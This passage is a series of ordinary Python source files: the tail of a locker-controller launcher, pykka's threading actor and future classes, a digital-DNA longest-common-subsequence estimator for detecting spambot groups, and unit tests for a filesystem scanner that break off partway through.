file_read = f.readlines()
if not file_read:
sleep(1)
else:
json_object = json.loads("".join(file_read))
LCKMngKey = json_object["LCKMngKey"]
except FileNotFoundError:
pass
sListener = sensor_listener.SensorListener(LCKMngKey)
proc2 = Process(target=sListener.listen, args=())
procs.append(proc2)
proc2.start()
sBehavior = locker_state.LockerState()
proc3 = Process(target=sBehavior.check_door, args=())
procs.append(proc3)
proc3.start()
# for p in procs:
# p.start()
for p in procs:
p.join()
|
_threading.py
|
import queue
import sys
import threading
from typing import Any, NamedTuple, Optional
from pykka import Actor, Future, Timeout
from pykka._types import OptExcInfo
__all__ = ["ThreadingActor", "ThreadingFuture"]
class ThreadingFutureResult(NamedTuple):
value: Optional[Any] = None
exc_info: Optional[OptExcInfo] = None
class ThreadingFuture(Future):
"""
:class:`ThreadingFuture` implements :class:`Future` for use with
:class:`ThreadingActor <pykka.ThreadingActor>`.
The future is implemented using a :class:`queue.Queue`.
The future does *not* make a copy of the object which is :meth:`set()
<pykka.Future.set>` on it. It is the setter's responsibility to only pass
immutable objects or make a copy of the object before setting it on the
future.
.. versionchanged:: 0.14
Previously, the encapsulated value was a copy made with
:func:`copy.deepcopy`, unless the encapsulated value was a future, in
which case the original future was encapsulated.
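A minimal usage sketch::
future = ThreadingFuture()
future.set(42)
assert future.get(timeout=1) == 42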
"""
def __init__(self):
super().__init__()
self._queue = queue.Queue(maxsize=1)
self._result = None
def get(self, timeout=None):
try:
return super().get(timeout=timeout)
except NotImplementedError:
pass
try:
if self._result is None:
self._result = self._queue.get(True, timeout)
if self._result.exc_info is not None:
(exc_type, exc_value, exc_traceback) = self._result.exc_info
if exc_value is None:
exc_value = exc_type()
if exc_value.__traceback__ is not exc_traceback:
raise exc_value.with_traceback(exc_traceback)
raise exc_value
else:
return self._result.value
except queue.Empty:
raise Timeout(f"{timeout} seconds")
def set(self, value=None):
self._queue.put(ThreadingFutureResult(value=value), block=False)
def set_exception(self, exc_info=None):
assert exc_info is None or len(exc_info) == 3
if exc_info is None:
exc_info = sys.exc_info()
self._queue.put(ThreadingFutureResult(exc_info=exc_info))
class ThreadingActor(Actor):
"""
:class:`ThreadingActor` implements :class:`Actor` using regular Python
threads.
This implementation is slower than :class:`GeventActor
<pykka.gevent.GeventActor>`, but can be used in a process with other
threads that are not Pykka actors.
"""
use_daemon_thread = False
"""
A boolean value indicating whether this actor is executed on a thread that
is a daemon thread (:class:`True`) or not (:class:`False`). This must be
set before :meth:`pykka.Actor.start` is called, otherwise
:exc:`RuntimeError` is raised.
The entire Python program exits when no alive non-daemon threads are left.
This means that an actor running on a daemon thread may be interrupted at
any time, and there is no guarantee that cleanup will be done or that
:meth:`pykka.Actor.on_stop` will be called.
Actors do not inherit the daemon flag from the actor that made it. It
always has to be set explicitly for the actor to run on a daemonic thread.
"""
@staticmethod
def _create_actor_inbox():
return queue.Queue()
@staticmethod
def _create_future():
return ThreadingFuture()
def _start_actor_loop(self):
thread = threading.Thread(target=self._actor_loop)
thread.name = thread.name.replace("Thread", self.__class__.__name__)
thread.daemon = self.use_daemon_thread
thread.start()
|
lcs.py
|
"""
This is a module to be used as a reference for building other modules
"""
import warnings
from glcr import longest_common_subsequence
from multiprocessing import Process
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from sklearn.base import BaseEstimator
from sklearn.utils.validation import check_array
from .verbosity import Verbosity
# noinspection PyIncorrectDocstring
class LongestCommonSubsequence(BaseEstimator):
""" The Digital DNA Python implementation.
Parameters
----------
in_path : str, optional
The name with absolute path of a file containing the sequences you want to process.
The input file must be a txt file and the first row must contain the number of sequences to read.
Default: ''
out_path : str, optional
The output file name with absolute path of the file where the algorithm will save results when
verbosity equals `Verbosity.FILE` or `Verbosity.FILE_EXTENDED`.
Default: '/tmp/glcr_cache'
overwrite : boolean, optional
It must be False to use the LCS files produced in a previous fit call, in this case the file names are
the ones specified in the out_path parameter. If True, recomputes the LCS files.
Default: False
threshold : 'auto' or int, optional
The cutting point between bot and not bot. If 'auto', the threshold is estimated from the LCS curve
using the window parameter; otherwise the given value is used directly as the cut.
Default: 'auto'
window : str, optional
The size of the window used to compute the cutting threshold between bot and not bot. The cutting point is
computed by smoothing the curve, deriving the result and taking the first (l.h.s.) local maxima. The window
parameter influences both smoothing and finding the local maxima.
It must be 2 < window < n_accounts.
Default: 10
verbosity : str, optional
The verbosity parameter is used to specify whether to save results to files or not. It must be:\n
- TEST does not write anything, used for benchmarking
- MEMORY_ONLY retrieves only the couples (sequence length, # of accounts), used for plots
- FILE produces 2 files, a file named out_path + '.gsa' where each row contains the identifier of the sequence. In the other file, named out_path + '.mat', each row contains:\n
- sequence length
- # of accounts
- range of indexes (begin and end)
- FILE_EXTENDED as FILE but the out_path + '.mat' file also contains the column of the common subsequence
References
----------
S. Cresci, R. D. Pietro, M. Petrocchi, A. Spognardi and M. Tesconi,
"Social Fingerprinting: Detection of Spambot Groups Through DNA-Inspired Behavioral Modeling",
IEEE Transactions on Dependable and Secure Computing, vol. 15, no. 4, pp. 561-576, 1 July-Aug. 2018,
https://ieeexplore.ieee.org/document/7876716
S. Cresci, R. di Pietro, M. Petrocchi, A. Spognardi and M. Tesconi,
"Exploiting Digital DNA for the Analysis of Similarities in Twitter Behaviours",
2017 IEEE International Conference on Data Science and Advanced Analytics (DSAA),
Tokyo, 2017, pp. 686-695, https://ieeexplore.ieee.org/document/8259831
M. Arnold, E. Ohlebusch, "Linear Time Algorithms for Generalizations of the Longest Common Substring Problem",
Algorithmica, vol 60, pp. 806-818, 4 August 2011, https://link.springer.com/article/10.1007/s00453-009-9369-1
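Examples
--------
A rough sketch, assuming the compiled `glcr` extension is installed and `/tmp` is writable; the sequences
below are purely illustrative::
import numpy as np
sequences = np.array(['ACCAT', 'ACCAT', 'ACGTT', 'CCATG'])
estimator = LongestCommonSubsequence(out_path='/tmp/glcr_cache', window=3)
labels = estimator.fit_predict(sequences)  # boolean array, True marks suspected bots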
"""
def __init__(self, in_path='', out_path='/tmp/glcr_cache', overwrite=False, threshold='auto', window=10, verbosity=Verbosity.FILE):
self.in_path = in_path
self.out_path = out_path
self.overwrite = overwrite
self.threshold = threshold
self.window = window
if self.window < 2:
raise ValueError('window parameter cannot be less than 2.')
self.verbosity = verbosity
def fit(self, X, y=None):
"""Computes the longest common subsequence
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The training input samples.
y : None
There is no need of a target in a transformer, yet the pipeline API
requires this parameter.
Attributes
----------
lcs_index_ : pandas dataframe, shape (distinct couples (lcs, n_of_accounts), 2), default=None
The dataframe containing the distinct couples (lcs, n_of_accounts). Only if:
verbosity == Verbosity.MEMORY_ONLY
Returns
-------
self : object
Returns self.
"""
warnings.simplefilter(action='ignore', category=FutureWarning)
self.gsa_ = '.gsa'
self.mat_ = '.mat'
if self.in_path == '':
X = self._unicode_to_ascii(X)
X = check_array(X, ensure_2d=False)
print("fitting...")
if self.verbosity == Verbosity.MEMORY_ONLY:
self.lcs_ = longest_common_subsequence(self._unicode_to_ascii(X), self.in_path, self.out_path,
self.verbosity)
elif self.verbosity > Verbosity.MEMORY_ONLY:
if self.in_path == '' or self.overwrite:
p = Process(target=longest_common_subsequence, args=(X, self.in_path, self.out_path, self.verbosity))
p.start()
p.join()
return self
def predict(self, X=None):
""" Predict the labels (True bot, False Not Bot) of X according to lcs and window parameter:.
If X is None, returns the same as fit_predict(X_train).
Parameters
----------
X : array-like, shape (n_samples, n_features), default=None
The query sample or samples to identify bot groups. If None,
makes prediction on the training data.
Returns
-------
y : array, shape (n_samples,)
Returns True for bots and False for real timeline.
"""
y = None
if self.verbosity > Verbosity.MEMORY_ONLY:
y = np.full(len(X), False)
mat_ix = set()
if self.threshold == 'auto':
print('finding cut...')
lengths = pd.read_csv(self.out_path+self.mat_, usecols=['length']).length.values
self.cut_ = self._decision_function(lengths)
else:
self.cut_ = self.threshold
print('predicting...')
class BreakIt(Exception):
pass
try:
for df in pd.read_csv(self.out_path + self.mat_, chunksize=500000):
for ix, row in df.iterrows():
curr_set = mat_ix.union(set(range(int(row.begin), int(row.end) + 1)))
if row.num_texts >= self.cut_: # not bot, exit
raise BreakIt
mat_ix = curr_set
except BreakIt:
pass
ix_size = len(mat_ix)
ix_count = 0
bot_ix = np.empty(ix_size, dtype=int)
try:
for df in pd.read_csv(self.out_path + self.gsa_, header=0, usecols=['wordindex'], squeeze=True,
chunksize=500000):
for ix, wordindex in df.items():
if ix in mat_ix:
# TODO delete the -1 when the gsa file is fixed
bot_ix[ix_count] = wordindex - 1
ix_count += 1
if ix_count == ix_size:
raise BreakIt
mat_ix.remove(ix)
except BreakIt:
y[bot_ix] = True
else:
warnings.warn("Cannot predict with verbosity level lower than FILE", Warning)
print('done.')
return y
def fit_predict(self, X, y=None):
""""Fits the model to the training set X and returns the labels
(True for bot, False for non bot) on the training set according to the window parameter.
Parameters
----------
X : array-like, shape (n_samples, n_features), default=None
The training input samples on which to fit the model and identify bot groups.
Attributes
----------
lcs_index_ : pandas dataframe, shape (distinct couples (lcs, n_of_accounts), 2), default=None
The dataframe containing the distinct couples (lcs, n_of_accounts)
Returns
-------
y : array, shape (n_samples,)
Returns True for bots and False for real timeline.
"""
return self.fit(X).predict(X)
def plot_LCS(self):
""""Plots the longest common subsequence curve as (number of accounts, sequence length)
Attributes
----------
lcs_index_ : pandas dataframe, shape (distinct couples (lcs, n_of_accounts), 2), default=None
The dataframe containing the distinct couples (lcs, n_of_accounts)
Returns
-------
self : returns an instance of self.
"""
plt.xlabel('# of accounts')
plt.ylabel('LCS')
if self.verbosity > Verbosity.MEMORY_ONLY and not hasattr(self, 'lcs_'):
self.lcs_ = pd.read_csv(self.out_path + self.mat_, usecols=['length', 'num_texts']) \
.drop_duplicates().reset_index().drop(['index'], axis=1)
plt.plot(self.lcs_.num_texts, self.lcs_.length, marker='x')
if hasattr(self, 'cut_'):
plt.plot([self.cut_, self.cut_], [0, max(self.lcs_.length)], linestyle='--')
#plt.show()
return plt
def plot_LCS_log(self):
""""Plots the longest common subsequence curve as (log(number of accounts), log(sequence length))
Attributes
----------
lcs_index_ : pandas dataframe, shape (distinct couples (lcs, n_of_accounts), 2), default=None
The dataframe containing the distinct couples (lcs, n_of_accounts)
Returns
-------
self : returns an instance of self.
"""
plt.xlabel('log(# of accounts)')
plt.ylabel('log(LCS)')
if self.verbosity > Verbosity.MEMORY_ONLY and not hasattr(self, 'lcs_'):
self.lcs_ = pd.read_csv(self.out_path + self.mat_, usecols=['length', 'num_texts']) \
.drop_duplicates().reset_index().drop(['index'], axis=1)
plt.loglog(self.lcs_.num_texts, self.lcs_.length, marker='x')
if hasattr(self, 'cut_'):
plt.plot([self.cut_, self.cut_], [0, max(self.lcs_.length)], linestyle='--')
# plt.show()
return plt
def _decision_function(self, X):
''' Finds the first relative maximum on the smoothed LCS vector'''
length = len(X)
w_size = self.window
X_avg_diff = np.diff(self._running_mean(X, w_size))
i = 0
max_index = length - w_size
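# advance past the initial region where the smoothed derivative stays at or above the mean of its
# forward window, then return the index of the maximum of the remaining derivative as the cutting point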
for i in range(max_index):
if X_avg_diff[i] < np.mean(X_avg_diff[i:i+w_size]):
break
t = np.argmax(X_avg_diff[i:])
return t + i - 1
def _running_mean(self, x, winsize):
for i in range(len(x)):
x[i] = x[max(0, i):min(i + winsize, len(x))].mean()
return x
def _unicode_to_ascii(self, array):
def f(item):
return str(item) + '\0'
def v(x):
return np.vectorize(f)(x)
return v(array).astype('S')
|
test_scanner.py
|
# Copyright 2017, Inderpreet Singh, All rights reserved.
import os
import shutil
import tempfile
import unittest
from threading import Thread
from datetime import datetime
from system import SystemScanner, SystemScannerError
def my_mkdir(*args):
os.mkdir(os.path.join(TestSystemScanner.temp_dir, *args))
def my_touch(size, *args):
path = os.path.join(TestSystemScanner.temp_dir, *args)
with open(path, 'wb') as f:
f.write(bytearray([0xff] * size))
def my_mkdir_latin(*args):
os.mkdir(os.path.join(TestSystemScanner.temp_dir.encode('latin-1'), *args))
def my_touch_latin(size, *args):
path = os.path.join(TestSystemScanner.temp_dir.encode('latin-1'), *args)
with open(path, 'wb') as f:
f.write(bytearray([0xff] * size))
# noinspection SpellCheckingInspection
class TestSystemScanner(unittest.TestCase):
temp_dir = None
def setUp(self):
# Create a temp directory
TestSystemScanner.temp_dir = tempfile.mkdtemp(prefix="test_system_scanner")
def tearDown(self):
# Cleanup
shutil.rmtree(TestSystemScanner.temp_dir)
def setup_default_tree(self):
# Create a bunch files and directories
# a [dir]
# aa [dir]
# .aaa [dir]
# .aab [file, 512 bytes]
# ab [file, 12*1024 + 4 bytes]
# b [dir]
# ba [dir]
# baa [file, 512 + 7 bytes]
# bb [dir]
# bba [dir]
# bbb [file, 24*1024*1024 + 24 bytes]
# bbc [dir]
# bbca [dir]
# .bbcaa [file, 1 byte]
# c [file, 1234 bytes]
my_mkdir("a")
my_mkdir("a", "aa")
my_mkdir("a", "aa", ".aaa")
my_touch(512, "a", "aa", ".aab")
my_touch(12*1024+4, "a", "ab")
my_mkdir("b")
my_mkdir("b", "ba")
my_touch(512+7, "b", "ba", "baa")
my_mkdir("b", "bb")
my_mkdir("b", "bb", "bba")
my_touch(24*1024*1024+24, "b", "bb", "bbb")
my_mkdir("b", "bb", "bbc")
my_mkdir("b", "bb", "bbc", "bbca")
my_touch(1, "b", "bb", "bbc", "bbca", ".bbcaa")
my_touch(1234, "c")
def test_scan_tree(self):
self.setup_default_tree()
scanner = SystemScanner(TestSystemScanner.temp_dir)
files = scanner.scan()
self.assertEqual(3, len(files))
a, b, c = tuple(files)
self.assertEqual("a", a.name)
self.assertTrue(a.is_dir)
self.assertEqual("b", b.name)
self.assertTrue(b.is_dir)
self.assertEqual("c", c.name)
self.assertFalse(c.is_dir)
self.assertEqual(2, len(a.children))
aa, ab = tuple(a.children)
self.assertEqual("aa", aa.name)
self.assertTrue(aa.is_dir)
self.assertEqual(2, len(aa.children))
aaa, aab = tuple(aa.children)
self.assertEqual(".aaa", aaa.name)
self.assertTrue(aaa.is_dir)
self.assertEqual(".aab", aab.name)
self.assertFalse(aab.is_dir)
self.assertEqual("ab", ab.name)
self.assertFalse(ab.is_dir)
self.assertEqual(2, len(b.children))
ba, bb = tuple(b.children)
self.assertEqual("ba", ba.name)
self.assertTrue(ba.is_dir)
self.assertEqual(1, len(ba.children))
baa = ba.children[0]
self.assertEqual("baa", baa.name)
self.assertFalse(baa.is_dir)
self.assertEqual("bb", bb.name)
self.assertTrue(bb.is_dir)
self.assertEqual(3, len(bb.children))
bba, bbb, bbc = tuple(bb.children)
self.assertEqual("bba", bba.name)
self.assertTrue(bba.is_dir)
self.assertEqual("bbb", bbb.name)
self.assertFalse(bbb.is_dir)
self.assertEqual("bbc", bbc.name)
self.assertTrue(bbc.is_dir)
self.assertEqual(1, len(bbc.children))
bbca = bbc.children[0]
self.assertEqual("bbca", bbca.name)
self.assertTrue(bbca.is_dir)
self.assertEqual(1, len(bbca.children))
bbcaa = bbca.children[0]
self.assertEqual(".bbcaa", bbcaa.name)
self.assertFalse(bbcaa.is_dir)
def test_scan_size(self):
self.setup_default_tree()
scanner = SystemScanner(TestSystemScanner.temp_dir)
files = scanner.scan()
self.assertEqual(3, len(files))
a, b, c = tuple(files)
aa, ab = tuple(a.children)
aaa, aab = tuple(aa.children)
ba, bb = tuple(b.children)
baa = ba.children[0]
bba, bbb, bbc = tuple(bb.children)
bbca = bbc.children[0]
bbcaa = bbca.children[0]
self.assertEqual(12*1024+4+512, a.size)
self.assertEqual(512, aa.size)
self.assertEqual(0, aaa.size)
self.assertEqual(512, aab.size)
self.assertEqual(12*1024+4, ab.size)
self.assertEqual(512+7+24*1024*1024+24+1, b.size)
self.assertEqual(512+7, ba.size)
self.assertEqual(512+7, baa.size)
self.assertEqual(24*1024*1024+24+1, bb.size)
self.assertEqual(0, bba.size)
self.assertEqual(24*1024*1024+24, bbb.size)
self.assertEqual(1, bbc.size)
self.assertEqual(1, bbca.size)
self.assertEqual(1, bbcaa.size)
self.assertEqual(1234, c.size)
def test_scan_non_existing_dir_fails(self):
self.setup_default_tree()
scanner = SystemScanner(
path_to_scan=os.path.join(TestSystemScanner.temp_dir, "nonexisting")
)
with self.assertRaises(SystemScannerError) as ex:
scanner.scan()
self.assertTrue(str(ex.exception).startswith("Path does not exist"))
def test_scan_file_fails(self):
self.setup_default_tree()
scanner = SystemScanner(
path_to_scan=os.path.join(TestSystemScanner.temp_dir, "c")
)
with self.assertRaises(SystemScannerError) as ex:
scanner.scan()
self.assertTrue(str(ex.exception).startswith("Path is not a directory"))
def test_scan_single_dir(self):
self.setup_default_tree()
scanner = SystemScanner(TestSystemScanner.temp_dir)
a = scanner.scan_single("a")
self.assertEqual("a", a.name)
self.assertTrue(a.is_dir)
self.assertEqual(2, len(a.children))
aa, ab = tuple(a.children)
self.assertEqual("aa", aa.name)
self.assertTrue(aa.is_dir)
self.assertEqual(2, len(aa.children))
aaa, aab = tuple(aa.children)
self.assertEqual(".aaa", aaa.name)
self.assertTrue(aaa.is_dir)
self.assertEqual(".aab", aab.name)
self.assertFalse(aab.is_dir)
self.assertEqual("ab", ab.name)
self.assertFalse(ab.is_dir)
self.assertEqual(12*1024+4+512, a.size)
self.assertEqual(512, aa.size)
self.assertEqual(0, aaa.size)
self.assertEqual(512, aab.size)
self.assertEqual(12*1024+4, ab.size)
def test_scan_single_file(self):
self.setup_default_tree()
scanner = SystemScanner(TestSystemScanner.temp_dir)
c = scanner.scan_single("c")
self.assertEqual("c", c.name)
self.assertFalse(c.is_dir)
self.assertEqual(1234, c.size)
def test_scan_single_non_existing_path_fails(self):
self.setup_default_tree()
scanner = SystemScanner(
path_to_scan=os.path.join(TestSystemScanner.temp_dir)
)
with self.assertRaises(SystemScannerError) as ex:
scanner.scan_single("nonexisting")
self.assertTrue(str(ex.exception).startswith("Path does not exist"))
def test_scan_tree_excluded_prefix(self):
self.setup_default_tree()
scanner = SystemScanner(TestSystemScanner.temp_dir)
scanner.add_exclude_prefix(".")
files = scanner.scan()
self.assertEqual(3, len(files))
a, b, c = tuple(files)
aa, ab = tuple(a.children)
ba, bb = tuple(b.children)
bba, bbb, bbc = tuple(bb.children)
bbca = bbc.children[0]
self.assertEqual(0, len(aa.children))
self.assertEqual(0, len(bbca.children))
scanner.add_exclude_prefix("ab")
files = scanner.scan()
self.assertEqual(3, len(files))
a, b, c = tuple(files)
self.assertEqual(1, len(a.children))
aa = a.children[0]
ba, bb = tuple(b.children)
bba, bbb, bbc = tuple(bb.children)
bbca = bbc.children[0]
self.assertEqual("aa", aa.name)
self.assertEqual(0, len(bbca.children))
def test_scan_size_excluded_prefix(self):
self.setup_default_tree()
scanner = SystemScanner(TestSystemScanner.temp_dir)
scanner.add_exclude_prefix(".")
files = scanner.scan()
self.assertEqual(3, len(files))
a, b, c = tuple(files)
aa, ab = tuple(a.children)
ba, bb = tuple(b.children)
bba, bbb, bbc = tuple(bb.children)
bbca = bbc.children[0]
self.assertEqual(12*1024+4, a.size)
self.assertEqual(0, aa.size)
self.assertEqual(24*1024*1024+24+0, bb.size)
self.assertEqual(0, bbc.size)
self.assertEqual(0, bbca.size)
scanner.add_exclude_prefix("ab")
files = scanner.scan()
self.assertEqual(3, len(files))
a, b, c = tuple(files)
self.assertEqual(1, len(a.children))
aa = a.children[0]
self.assertEqual("aa", aa.name)
self.assertEqual(0, a.size)
self.assertEqual(0, aa.size)
def test_scan_tree_excluded_suffix(self):
self.setup_default_tree()
scanner = SystemScanner(TestSystemScanner.temp_dir)
scanner.add_exclude_suffix("ab")
scanner.add_exclude_suffix("bb")
files = scanner.scan()
self.assertEqual(3, len(files))
a, b, c = tuple(files)
self.assertEqual(1, len(a.children))
aa = a.children[0]
self.assertEqual("aa", aa.name)
self.assertEqual(1, len(aa.children))
aaa = aa.children[0]
self.assertEqual(".aaa", aaa.name)
self.assertEqual(1, len(b.children))
ba = b.children[0]
self.assertEqual("ba", ba.name)
def test_scan_size_excluded_suffix(self):
self.setup_default_tree()
scanner = SystemScanner(TestSystemScanner.temp_dir)
scanner.add_exclude_suffix("ab")
scanner.add_exclude_suffix("bb")
files = scanner.scan()
a, b, c = tuple(files)
aa = a.children[0]
aaa = aa.children[0]
ba = b.children[0]
self.assertEqual(0, a.size)
self.assertEqual(0, aa.size)
self.assertEqual(0, aaa.size)
self.assertEqual(512+7, b.size)
self.assertEqual(512+7, ba.size)
self.assertEqual(1234, c.size)
def test_lftp_status_file_size(self):
self.setup_default_tree()
scanner = SystemScanner(TestSystemScanner.temp_dir)
size = scanner._lftp_status_file_size("""
size=243644865
0.pos=31457280
0.limit=60911217
1.pos=87060081
1.limit=121822433
2.pos=144268513
2.limit=182733649
3.pos=207473489
3.limit=243644865
""")
self.assertEqual(104792064, size)
def test_scan_lftp_partial_file(self):
tempdir = TestSystemScanner.temp_dir
# Create a partial file
os.mkdir(os.path.join(tempdir, "t"))
path = os.path.join(tempdir, "t", "partial.mkv")
with open(path, 'wb') as f:
f.write(bytearray([0xff] * 24588))
# Write the lftp status out
path = os.path.join(tempdir, "t", "partial.mkv.lftp-pget-status")
with open(path, "w") as f:
f.write("""
size=24588
0.pos=3157
0.limit=6147
1.pos=11578
1.limit=12294
2.pos=12295
2.limit=18441
3.pos=20000
3.limit=24588
""")
scanner = SystemScanner(tempdir)
files = scanner.scan()
self.assertEqual(1, len(files))
t = files[0]
self.assertEqual("t", t.name)
self.assertEqual(10148, t.size)
self.assertEqual(1, len(t.children))
partial_mkv = t.children[0]
self.assertEqual("partial.mkv", partial_mkv.name)
self.assertEqual(10148, partial_mkv.size)
def test_scan_single_lftp_partial_file(self):
# Scan a single partial file
tempdir = TestSystemScanner.temp_dir
# Create a partial file
path = os.path.join(tempdir, "partial.mkv")
with open(path, 'wb') as f:
f.write(bytearray([0xff] * 24588))
# Write the lftp status out
path = os.path.join(tempdir, "partial.mkv.lftp-pget-status")
with open(path, "w") as f:
f.write("""
size=24588
0.pos=3157
0.limit=6147
1.pos=11578
1.limit=12294
2.pos=12295
2.limit=18441
3.pos=20000
3.limit=24588
""")
scanner = SystemScanner(tempdir)
partial_mkv = scanner.scan_single("partial.mkv")
self.assertEqual("partial.mkv", partial_mkv.name)
self.assertEqual(10148, partial_mkv.size)
def test_scan_lftp_temp_file(self):
tempdir = TestSystemScanner.temp_dir
# Create some temp and non-temp files
temp1 = os.path.join(tempdir, "a.mkv.lftp")
with open(temp1, 'wb') as f:
f.write(bytearray([0xff] * 100))
temp2 = os.path.join(tempdir, "b.rar.lftp")
with open(temp2, 'wb') as f:
f.write(bytearray([0xff] * 200))
nontemp1 = os.path.join(tempdir, "c.rar")
with open(nontemp1, 'wb') as f:
f.write(bytearray([0xff] * 300))
nontemp2 = os.path.join(tempdir, "d.lftp.avi")
with open(nontemp2, 'wb') as f:
f.write(bytearray([0xff] * 400))
nontemp3 = os.path.join(tempdir, "e")
os.mkdir(nontemp3)
temp3 = os.path.join(nontemp3, "ea.txt.lftp")
with open(temp3, 'wb') as f:
f.write(bytearray([0xff] * 500))
nontemp4 = os.path.join(tempdir, "f.lftp")
os.mkdir(nontemp4)
scanner = SystemScanner(tempdir)
# No temp suffix set
files = scanner.scan()
self.assertEqual(6, len(files))
a, b, c, d, e, f = tuple(files)
self.assertEqual("a.mkv.lftp", a.name)
self.assertEqual(100, a.size)
self.assertEqual(False, a.is_dir)
self.assertEqual("b.rar.lftp", b.name)
self.assertEqual(200, b.size)
self.assertEqual(False, b.is_dir)
self.assertEqual("c.rar", c.name)
self.assertEqual(300, c.size)
self.assertEqual(False, c.is_dir)
self.assertEqual("d.lftp.avi", d.name)
self.assertEqual(400, d.size)
self.assertEqual(False, d.is_dir)
self.assertEqual("e", e.name)
self.assertEqual(500, e.size)
self.assertEqual(True, e.is_dir)
self.assertEqual(1, len(e.children))
ea = e.children[0]
self.assertEqual("ea.txt.lftp", ea.name)
self.assertEqual(500, ea.size)
self.assertEqual(False, ea.is_dir)
self.assertEqual("f.lftp", f.name)
self.assertEqual(0, f.size)
self.assertEqual(True, f.is_dir)
# Temp suffix set
scanner.set_lftp_temp_suffix(".lftp")
files = scanner.scan()
self.assertEqual(6, len(files))
a, b, c, d, e, f = tuple(files)
self.assertEqual("a.mkv", a.name)
self.assertEqual(100, a.size)
self.assertEqual(False, a.is_dir)
self.assertEqual("b.rar", b.name)
self.assertEqual(200, b.size)
self.assertEqual(False, b.is_dir)
self.assertEqual("c.rar", c.name)
self.assertEqual(300, c.size)
self.assertEqual(False, c.is_dir)
self.assertEqual("d.lftp.avi", d.name)
self.assertEqual(400, d.size)
self.assertEqual(False, d.is_dir)
self.assertEqual("e", e.name)
self.assertEqual(500, e.size)
self.assertEqual(True, e.is_dir)
self.assertEqual(1, len(e.children))
ea = e.children[0]
self.assertEqual("ea.txt", ea.name)
self.assertEqual(500, ea.size)
self.assertEqual(False, ea.is_dir)
self.assertEqual("f.lftp", f.name)
self.assertEqual(0, f.size)
self.assertEqual(True, f.is_dir)
def test_scan_single_lftp_temp_file(self):
tempdir = TestSystemScanner.temp_dir
# Create:
# temp file
# non-temp file and
# non-temp directory with temp name
# non-temp directory with non-temp name
temp1 = os.path.join(tempdir, "a.mkv.lftp")
with open(temp1, 'wb') as f:
f.write(bytearray([0xff] * 100))
nontemp1 = os.path.join(tempdir, "b.rar")
with open(nontemp1, 'wb') as f:
f.write(bytearray([0xff] * 300))
nontemp2 = os.path.join(tempdir, "c.lftp")
os.mkdir(nontemp2)
temp2 = os.path.join(nontemp2, "c.txt.lftp")
with open(temp2, 'wb') as f:
f.write(bytearray([0xff] * 500))
nontemp3 = os.path.join(tempdir, "d")
os.mkdir(nontemp3)
temp3 = os.path.join(nontemp3, "d.avi.lftp")
with open(temp3, 'wb') as f:
f.write(bytearray([0xff] * 600))
scanner = SystemScanner(tempdir)
# No temp suffix set, must include temp suffix in name param
file = scanner.scan_single("a.mkv.lftp")
self.assertEqual("a.mkv.lftp", file.name)
self.assertEqual(100, file.size)
self.assertEqual(False, file.is_dir)
file = scanner.scan_single("b.rar")
self.assertEqual("b.rar", file.name)
self.assertEqual(300, file.size)
self.assertEqual(False, file.is_dir)
file = scanner.scan_single("c.lftp")
self.assertEqual("c.lftp", file.name)
self.assertEqual(500, file.size)
self.assertEqual(True, file.is_dir)
self.assertEqual(1, len(file.children))
child = file.children[0]
self.assertEqual("c.txt.lftp", child.name)
self.assertEqual(500, child.size)
self.assertEqual(False, child.is_dir)
file = scanner.scan_single("d")
self.assertEqual("d", file.name)
self.assertEqual(600, file.size)
self.assertEqual(True, file.is_dir)
child = file.children[0]
self.assertEqual("d.avi.lftp", child.name)
self.assertEqual(600, child.size)
self.assertEqual(False, child.is_dir)
# Temp suffix set, must NOT include temp suffix in name param
scanner.set_lftp_temp_suffix(".lftp")
file = scanner.scan_single("a.mkv")
self.assertEqual("a.mkv", file.name)
self.assertEqual(100, file.size)
self.assertEqual(False, file.is_dir)
file = scanner.scan_single("b.rar")
self.assertEqual("b.rar", file.name)
self.assertEqual(300, file.size)
self.assertEqual(False, file.is_dir)
file = scanner.scan_single("c.lftp")
self.assertEqual("c.lftp", file.name)
self.assertEqual(500, file.size)
self.assertEqual(True, file.is_dir)
self.assertEqual(1, len(file.children))
child = file.children[0]
self.assertEqual("c.txt", child.name)
self.assertEqual(500, child.size)
self.assertEqual(False, child.is_dir)
# also, shouldn't look for directories with temp suffix
with self.assertRaises(SystemScannerError) as ctx:
scanner.scan_single("c")
self.assertTrue("Path does not exist" in str(ctx.exception))
file = scanner.scan_single("d")
self.assertEqual("d", file.name)
self.assertEqual(600, file.size)
self.assertEqual(True, file.is_dir)
child = file.children[0]
self.assertEqual("d.avi", child.name)
self.assertEqual(600, child.size)
self.assertEqual(False, child.is_dir)
# No file and no temp file
with self.assertRaises(SystemScannerError) as ctx:
scanner.scan_single("blah")
self.assertTrue("Path does not exist" in str(ctx.exception))
def test_files_deleted_while_scanning(self):
self.setup_default_tree()
scanner = SystemScanner(TestSystemScanner.temp_dir)
stop = False
# Make and delete files while test runs
def monkey_with_files():
orig = os.path.join(TestSystemScanner.temp_dir, "b")
dest = os.path.join(TestSystemScanner.temp_dir, "b_copy")
while not stop:
shutil.copytree(orig, dest)
shutil.rmtree(dest)
thread = Thread(target=monkey_with_files)
thread.start()
try:
# Scan a bunch of times
for i in range(0, 2000):
files = scanner.scan()
# Must have at least the untouched files
self.assertGreaterEqual(len(files), 3)
names = set([f.name for f in files])
self.assertIn("a", names)
self.assertIn("b", names)
self.assertIn("c", names)
finally:
stop = True
thread.join()
def test_scan_modified_time(self):
self.setup_default_tree()
# directory
os.utime(
os.path.join(TestSystemScanner.temp_dir, "a"),
(
datetime.now().timestamp(),
datetime(2018, 11, 9, 21, 40, 18).timestamp()
)
)
# file
os.utime(
os.path.join(TestSystemScanner.temp_dir, "c"),
(
datetime.now().timestamp(),
datetime(2018, 11, 9, 21, 40, 17).timestamp()
)
)
scanner = SystemScanner(TestSystemScanner.temp_dir)
files = scanner.scan()
self.assertEqual(3, len(files))
a, b, c = tuple(files)
self.assertEqual(datetime(2018, 11, 9, 21, 40, 18), a.timestamp_modified)
self.assertEqual(datetime(2018, 11, 9, 21, 40, 17), c.timestamp_modified)
def test_scan_file_with_unicode_chars(self):
tempdir = TestSystemScanner.temp_dir
# déģķ [dir]
# dőÀ [file, 128 bytes]
my_mkdir("déģķ")
my_touch(128, "dőÀ")
scanner = SystemScanner(tempdir)
files = scanner.scan()
self.assertEqual(2, len(files))
folder, file = tuple(files)
self.assertEqual(0, len(folder.children))
self.assertEqual("déģķ", folder.name)
self.assertEqual("dőÀ", file.name)
self.assertEqual(128, file.size)
def test_scan_file_with_latin_chars(self):
